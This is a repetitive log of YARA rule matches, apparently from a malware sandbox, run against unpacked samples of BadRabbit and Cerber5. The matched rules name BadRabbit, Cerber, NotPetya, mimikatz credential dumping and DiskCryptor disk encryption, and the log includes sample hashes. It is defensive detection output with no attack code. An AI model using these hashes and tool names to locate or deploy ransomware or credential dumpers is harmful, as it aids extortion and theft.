Source: 32.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.Endermanch@BadRabbit.exe.140f570.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 40.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 19.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 49.2.Endermanch@BadRabbit.exe.1586018.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.3.rundll32.exe.4c2ba0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 19.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 32.2.Endermanch@BadRabbit.exe.1036698.0.raw.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 58.2.Endermanch@Cerber5.exe.4de0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 3.2.rundll32.exe.4c2ba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 10.2.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 58.2.Endermanch@Cerber5.exe.4e10000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 1.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.Endermanch@BadRabbit.exe.140f570.1.raw.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 27.0.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 27.0.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE	Matched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
Source: 1.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 4.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 3.2.rundll32.exe.4c2ba0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 3.2.rundll32.exe.444ff8.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.rundll32.exe.444ff8.1.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 47.2.rundll32.exe.5c4e70.0.raw.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 47.2.rundll32.exe.5c4e70.0.raw.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 40.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 3.3.rundll32.exe.4c2ba0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 3.3.rundll32.exe.4c2ba0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 49.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 58.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 3.3.rundll32.exe.4c2ba0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 58.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 58.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 32.2.Endermanch@BadRabbit.exe.1036698.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 40.2.Endermanch@Cerber5.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 3.3.rundll32.exe.4c2ba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 27.2.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 27.2.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE	Matched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
Source: 9.2.rundll32.exe.6b5050.0.raw.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.rundll32.exe.6b5050.0.raw.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.Endermanch@Cerber5.exe.5e70000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 32.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 32.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 40.2.Endermanch@Cerber5.exe.4df0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 1.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 49.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 4.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 47.2.rundll32.exe.4200000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 47.2.rundll32.exe.4200000.1.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 58.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 3.2.rundll32.exe.7b0000.2.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.rundll32.exe.7b0000.2.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.rundll32.exe.4220000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.rundll32.exe.4220000.1.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 27.0.5753.tmp.7ff7cef20000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 27.0.5753.tmp.7ff7cef20000.1.unpack, type: UNPACKEDPE	Matched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
Source: 49.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.Endermanch@Cerber5.exe.5e70000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 1.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.Endermanch@BadRabbit.exe.1426458.1.raw.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 40.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 3.3.rundll32.exe.4c2ba0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 40.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 19.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 58.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 9.2.rundll32.exe.6b5050.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.rundll32.exe.6b5050.0.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
